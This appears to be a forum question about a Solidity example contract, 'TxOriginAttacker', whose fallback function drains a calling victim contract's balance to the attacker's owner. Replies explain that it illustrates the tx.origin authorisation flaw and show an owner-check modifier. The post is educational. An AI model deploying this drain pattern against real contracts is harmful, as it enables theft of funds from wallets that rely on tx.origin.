pragma solidity ^0.5.8;
interface TxOriginVictim {
function transferTo(address to, uint amount) external;
}
contract TxOriginAttacker {
address owner;
constructor () public { owner = msg.sender;}
function getOwner() public returns (address) { return owner;}
function() external payable {
TxOriginVictim(msg.sender).transferTo(owner, msg.sender.balance);
}
}
In the TxOriginAttacker contract, I can’t understand the purpose of TxOriginVictim’s interface. What is TxOriginVictim(msg.sender) in the statement:
TxOriginVictim(msg.sender).transferTo(owner, msg.sender.balance);
It's illustrating a vulnerability in using tx.origin
Which is why in modern solidity development we use
modifier onlyOwner() {
require(ownerOfToken == _msgSender(), "Ownable: caller is not the owner"); // Throws if called by any account other than the owner.
_; // when using a modifier, the code from the function is inserted here. // if multiple modifiers then the previous one inherits the next one's modifier code
}
~